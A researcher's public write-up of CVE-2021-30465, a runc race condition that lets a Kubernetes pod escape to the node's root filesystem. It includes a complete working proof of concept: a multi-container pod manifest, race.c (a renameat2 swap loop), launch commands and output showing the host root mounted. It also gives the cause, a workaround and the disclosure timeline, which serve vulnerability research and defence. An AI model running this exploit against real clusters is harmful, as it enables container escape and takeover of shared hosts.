runc mount destinations can be swapped via symlink-exchange to cause mounts outside the rootfs (CVE-2021-30465)

It’s November 2020 and I’m troubleshooting a container running on K8S that is doing tons of writes to the local disk. As those writes are just temporary states, I quickly add an emptyDir tmpfs volume at /var/run, open a ticket so that my devs make it permanent, and call it a day.

Some time later, looking at the mount output, I notice that this new tmpfs is mounted at /run instead of /var/run. I missed this earlier and it surprises me a bit. /var/run is a symlink to ../run, and a quick test confirms that having mount follow symlinks is the normal Linux behavior. So I start wondering how containerd/runc makes sure the mounts stay inside the container rootfs.
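The symlink behavior is easy to reproduce without mounting anything. This is a minimal sketch, assuming a Linux system with GNU readlink; the scratch directory and variable names are made up for the illustration. It rebuilds the var/run -> ../run layout in a temporary directory and resolves the path the way a symlink-following lookup would:

```shell
# Recreate the usual layout in a scratch directory: var/run -> ../run
demo_root=$(mktemp -d)
mkdir -p "$demo_root/run" "$demo_root/var"
ln -s ../run "$demo_root/var/run"

# readlink -f follows every symlink in the path, much like the kernel
# does when it looks up a mount target.
resolved=$(readlink -f "$demo_root/var/run")
expected=$(readlink -f "$demo_root/run")

echo "var/run resolves to: $resolved"
```

Anything mounted "at var/run" through a symlink-following lookup would therefore end up on run.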

After following the code responsible for the mounts, I end up reading the comment of securejoin.SecureJoinVFS():

// Note that the guarantees provided by this function only apply if the path
// components in the returned string are not modified (in other words are not
// replaced with symlinks on the filesystem) after this function has returned.
// Such a symlink race is necessarily out-of-scope of SecureJoin.

If you are reading this, you already know that this race condition exists. The question is how to exploit it to escape to the K8S host.

POC

When mounting a volume, runc trusts the source and lets the kernel follow symlinks, but it doesn’t trust the target argument: it uses the ‘filepath-securejoin’ library to resolve any symlink and ensure the resolved target stays inside the container root. As explained in the SecureJoinVFS() documentation, using this function is only safe if you know that the checked path is not going to be replaced by a symlink afterwards. The problem is that we can replace it with a symlink. In K8S there is a trivial way to control the target: create a pod with multiple containers sharing some volumes, one with a valid image and the others with non-existent images so they don’t start right away.

Let’s start with the POC; the explanations come after.

Create our attack POD

kubectl create -f - <<EOF
apiVersion: v1
kind: Pod
metadata:
  name: attack
spec:
  terminationGracePeriodSeconds: 1
  containers:
  - name: c1
    image: ubuntu:latest
    command: [ "/bin/sleep", "inf" ]
    env:
    - name: MY_POD_UID
      valueFrom:
        fieldRef:
          fieldPath: metadata.uid
    volumeMounts:
    - name: test1
      mountPath: /test1
    - name: test2
      mountPath: /test2
$(for c in {2..20}; do
cat <<EOC
  - name: c$c
    image: donotexists.com/do/not:exist
    command: [ "/bin/sleep", "inf" ]
    volumeMounts:
    - name: test1
      mountPath: /test1
$(for m in {1..4}; do
cat <<EOM
    - name: test2
      mountPath: /test1/mnt$m
EOM
done
)
    - name: test2
      mountPath: /test1/zzz
EOC
done
)
  volumes:
  - name: test1
    emptyDir:
      medium: "Memory"
  - name: test2
    emptyDir:
      medium: "Memory"
EOF

Compile race.c, a simple binary that calls renameat2(dir, symlink, RENAME_EXCHANGE) in a loop

cat > race.c <<'EOF'
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <unistd.h>
#include <sys/syscall.h>

int main(int argc, char *argv[]) {
    if (argc != 4) {
        fprintf(stderr, "Usage: %s name1 name2 linkdest\n", argv[0]);
        exit(EXIT_FAILURE);
    }
    char *name1 = argv[1];
    char *name2 = argv[2];
    char *linkdest = argv[3];

    int dirfd = open(".", O_DIRECTORY|O_CLOEXEC);
    if (dirfd < 0) {
        perror("Error open CWD");
        exit(EXIT_FAILURE);
    }

    if (mkdir(name1, 0755) < 0) {
        perror("mkdir failed");
        //do not exit
    }
    if (symlink(linkdest, name2) < 0) {
        perror("symlink failed");
        //do not exit
    }

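    /* Atomically swap the directory and the symlink forever, so that a
       concurrent path check and a later mount() may see different objects. */
    while (1) {
        renameat2(dirfd, name1, dirfd, name2, RENAME_EXCHANGE);
    }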
}
EOF

gcc race.c -O3 -o race

Wait for the container c1 to start, upload the ‘race’ binary to it, and exec bash

sleep 30 # wait for the first container to start
kubectl cp race -c c1 attack:/test1/
kubectl exec -ti pod/attack -c c1 -- bash

You now have a shell in container c1.

Create the following symlink (explanations later)
```
ln -s / /test2/test2
```

Launch ‘race’ multiple times to try to exploit this TOCTOU

cd test1
seq 1 4 | xargs -n1 -P4 -I{} ./race mnt{} mnt-tmp{} /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/

Now that everything is ready, in a second shell, update the images so that the other containers can start
```
for c in {2..20}; do
  kubectl set image pod attack c$c=ubuntu:latest
done
```

Wait a bit and look at the results

for c in {2..20}; do
  echo ~~ Container c$c ~~
  kubectl exec -ti pod/attack -c c$c -- ls /test1/zzz
done

~~ Container c2 ~~
test2
~~ Container c3 ~~
test2
~~ Container c4 ~~
test2
~~ Container c5 ~~
bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
boot  etc  lib lost+found  opt  proc    run   sys usr
~~ Container c6 ~~
bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
boot  etc  lib lost+found  opt  proc    run   sys usr
~~ Container c7 ~~
error: unable to upgrade connection: container not found ("c7")
~~ Container c8 ~~
test2
~~ Container c9 ~~
bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
~~ Container c10 ~~
test2
~~ Container c11 ~~
bin   dev  home  lib64     mnt  postinst  root  sbin tmp  var
boot  etc  lib lost+found  opt  proc    run   sys usr
~~ Container c12 ~~
test2
~~ Container c13 ~~
test2
~~ Container c14 ~~
test2
~~ Container c15 ~~
bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
~~ Container c16 ~~
error: unable to upgrade connection: container not found ("c16")
~~ Container c17 ~~
error: unable to upgrade connection: container not found ("c17")
~~ Container c18 ~~
bin  boot  dev etc  home  lib lib64  lost+found  mnt opt  postinst  proc  root  run sbin  sys  tmp usr  var
~~ Container c19 ~~
error: unable to upgrade connection: container not found ("c19")
~~ Container c20 ~~
test2

On my first try running this POC, I had 6 containers where /test1/zzz was / on the node, some failed to start, and the remaining were not affected.

Even without the ability to update images, we could use a fast registry for c1 and a slow registry or a big image for c2+. We just need c1 to start 1 second before the others.

Tests were done on the following GKE cluster:

gcloud beta container --project "delta-array-282919" clusters create "toctou" --zone "us-central1-c" --no-enable-basic-auth --cluster-version "1.18.12-gke.1200" --release-channel "rapid" --machine-type "e2-medium" --image-type "COS_CONTAINERD" --disk-type "pd-standard" --disk-size "100" --metadata disable-legacy-endpoints=true --scopes "https://www.googleapis.com/auth/devstorage.read_only","https://www.googleapis.com/auth/logging.write","https://www.googleapis.com/auth/monitoring","https://www.googleapis.com/auth/servicecontrol","https://www.googleapis.com/auth/service.management.readonly","https://www.googleapis.com/auth/trace.append" --num-nodes "3" --enable-stackdriver-kubernetes --enable-ip-alias --network "projects/delta-array-282919/global/networks/default" --subnetwork "projects/delta-array-282919/regions/us-central1/subnetworks/default" --default-max-pods-per-node "110" --no-enable-master-authorized-networks --addons HorizontalPodAutoscaling,HttpLoadBalancing --enable-autoupgrade --enable-autorepair --max-surge-upgrade 1 --max-unavailable-upgrade 0 --enable-shielded-nodes

K8S 1.18.12, containerd 1.4.1, runc 1.0.0-rc10, 2 vCPUs

Explanations

I haven’t dug too deep into the code and relied on strace to understand what was happening. I also did the investigation about a month before finally having a working POC, so details are fuzzy, but here is my understanding:

1. K8S prepares all the volumes for the pod in /var/lib/kubelet/pods/$MY_POD_UID/volumes/VOLUME-TYPE/VOLUME-NAME (in my POC I rely on the path being known, but /proc/self/mountinfo leaks all you need to find it)
2. containerd prepares the rootfs at /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs
3. runc calls unshare(CLONE_NEWNS) and sets the mount propagation to MS_SLAVE, thus preventing the following mount operations from affecting other containers or the node directly
4. runc bind-mounts the K8S volumes
   1. runc calls securejoin.SecureJoin() to resolve the destination/target
   2. runc calls mount()
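
The mountinfo leak mentioned above can be sketched as follows. This is an illustration under assumptions: the function name pod_uid_from_mountinfo is made up, the sample lines are hypothetical, and the exact prefix in front of kubelet/pods/ depends on how the node lays out its filesystems. The fourth field of each mountinfo line is the root of the mount within its filesystem, which is where a bind-mounted kubelet path would show up.

```shell
# Print the pod UIDs that appear in the "root" field (field 4) of a
# mountinfo file. Defaults to the calling process's own mountinfo.
pod_uid_from_mountinfo() {
    awk '{ print $4 }' "${1:-/proc/self/mountinfo}" |
        sed -n 's|.*/kubelet/pods/\([^/]*\)/.*|\1|p' |
        sort -u
}

# Hypothetical sample lines; a real container would show many more.
sample=$(mktemp)
cat > "$sample" <<'EOF'
2100 2050 8:1 /var/lib/kubelet/pods/11111111-2222-3333-4444-555555555555/etc-hosts /etc/hosts rw,relatime - ext4 /dev/sda1 rw
2101 2050 0:45 / /test1 rw,relatime - tmpfs tmpfs rw
EOF

found_uid=$(pod_uid_from_mountinfo "$sample")
echo "pod UID: $found_uid"
```

Inside a container, calling pod_uid_from_mountinfo without an argument reads /proc/self/mountinfo directly.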

K8S doesn’t give us control over the mount source, but we have full control over the target of the mount. The trick is to mount a directory containing a symlink over the K8S volumes path, so that the next mount uses this new source and gives us access to the node root filesystem.

From the node, the filesystem looks like this

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt1
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp1 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt2 -> /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mnt-tmp2
...
/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2/test2 -> /

Our race binary is constantly swapping mntX and mnt-tmpX. When c2+ start, they do the following mounts

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/mntX)

which is equivalent to

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test1/mntX)

as the volume is bind mounted into the container rootfs

If we are lucky, mntX is a directory when SecureJoin() is called and a symlink by the time mount() is called. As mount() follows symlinks, this gives us

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/)

The filesystem now looks like

/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2 -> /

When we do the final mount

mount(/var/lib/kubelet/pods/$MY_POD_UID/volumes/kubernetes.io~empty-dir/test2, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)

resolves to

mount(/, /run/containerd/io.containerd.runtime.v2.task/k8s.io/SOMERANDOMID/rootfs/test1/zzz)

And we now have full access to the whole node root, including /dev, /proc, all the tmpfs and overlay of other containers, everything :)
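
The check-then-use gap at the heart of this can be replayed harmlessly in a scratch directory. This is a sketch only: nothing is mounted, the three mv calls stand in for the atomic renameat2(RENAME_EXCHANGE) done by race.c, and readlink -f stands in for the symlink-following lookup done by mount(). The names other than mnt1 and mnt-tmp1 are made up.

```shell
work=$(mktemp -d)
mkdir "$work/mnt1" "$work/elsewhere"
ln -s "$work/elsewhere" "$work/mnt-tmp1"

# Step 1 (check): the target is a plain directory, which is what a
# SecureJoin()-style resolution would observe at this instant.
if [ -d "$work/mnt1" ] && [ ! -L "$work/mnt1" ]; then
    checked=dir
else
    checked=other
fi

# Between check and use, the attacker swaps the two names.
mv "$work/mnt1" "$work/swap"
mv "$work/mnt-tmp1" "$work/mnt1"
mv "$work/swap" "$work/mnt-tmp1"

# Step 2 (use): a symlink-following lookup of the same name now lands
# somewhere else entirely.
used=$(readlink -f "$work/mnt1")

echo "checked: $checked"
echo "used:    $used"
```

In the real attack the swap runs in a tight loop, so only some of the mounts happen to fall between the two steps.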

Workaround

A possible workaround is to forbid mounting volumes in volumes, but as usual upgrading is recommended.
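
As an illustration of what "volumes in volumes" means in practice, here is a minimal sketch of the path comparison such a check would need. The function names are made up, and how the mount paths are extracted from a pod spec or enforced in a cluster is left out entirely.

```shell
# Return 0 if mount path $2 lies strictly inside mount path $1.
is_nested_mount() {
    parent=${1%/}   # drop one trailing slash so "/test1/" acts like "/test1"
    child=${2%/}
    case "$child" in
        "$parent"/*) return 0 ;;
        *)           return 1 ;;
    esac
}

# Print every "parent child" pair of nested paths among the arguments.
list_nested_mounts() {
    for p in "$@"; do
        for c in "$@"; do
            if is_nested_mount "$p" "$c"; then
                echo "$p $c"
            fi
        done
    done
}

nested=$(list_nested_mounts /test1 /test1/mnt1 /test2 /test10)
echo "$nested"
```

With the mount paths of containers c2+ from the POC, every /test1/mntX and /test1/zzz entry would be reported as nested under /test1.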

Comments

This POC is far from being optimal and, as already stated, being able to update the image is not mandatory.

It took me some tries to have a working POC. At first I was trying to just mount the tmpfs volume to impact the host (/root/.ssh), but this doesn’t work as the mounts happen in a new mount namespace (and with the right mount propagation set), so they are not visible in the host mount namespace. I then tried a golang version of the race binary with 4 containers and 20 volumes, and this always failed. I then switched to a C version (not sure it makes a difference) with 19 containers and 4 mounts, and this worked and gave me 6 containers out of 19 with the host mounted.

Even with newer syscalls like openat2(), you still need to mount(/proc/self/fd/X, /proc/self/fd/Y) to be race free. I’m not sure how useful a new mount flag that fails when one of the params is a symlink would be, but this is a huge footgun.
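
The property that makes the /proc/self/fd form race free can be shown without mounting anything. This is a sketch, assuming Linux with /proc available; it is not what runc does, and the directory names are made up. A file descriptor keeps referring to the object that was opened, even if its name is later replaced by a symlink:

```shell
work=$(mktemp -d)
mkdir "$work/mnt1" "$work/elsewhere"

# Open the directory once; file descriptor 3 now refers to that object.
exec 3< "$work/mnt1"

# Replace the name with a symlink, as the attacker would.
mv "$work/mnt1" "$work/old"
ln -s "$work/elsewhere" "$work/mnt1"

by_name=$(readlink -f "$work/mnt1")   # follows the new symlink
by_fd=$(readlink /proc/self/fd/3)     # still the directory we opened

echo "by name: $by_name"
echo "by fd:   $by_fd"

exec 3<&-   # close the descriptor
```

Looking the path up by name again is what reopens the race; going through the descriptor does not.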

This vulnerability exists because having untrusted/restricted container definitions was not part of the initial threat model of Docker/runc and was added later by K8S. You can sometimes read that K8S is multi-tenant, but you have to understand it as multiple trusted teams, not as giving API access to strangers.

On February 24th, 2021, Google introduced GKE Autopilot: fully managed K8S clusters with an emphasis on security and theoretically no access to the node. After testing, I also reported the issue to them.

Timeline

2020-11-??: Discover SecureJoinVFS() comment
2020-12-26: Initial report to security@opencontainers.org (Merry Christmas :) )
2020-12-27: Report acknowledgment
2021-03-06: Report to Google for their new GKE Autopilot
2021-04-07: Got added to discussions around the fix
2021-04-08: Google bounty :) (to be donated to Handicap International)
2021-05-19: End of embargo, advisory published on GitHub and on OSS-Security
2021-05-30: Write-up + POC public

Acknowledgments

Thanks to Aleksa Sarai (runc maintainer) for his fast responses and all his work, to Noah Meyerhans and Samuel Karp for their help fixing and testing, and to Google for the bounty.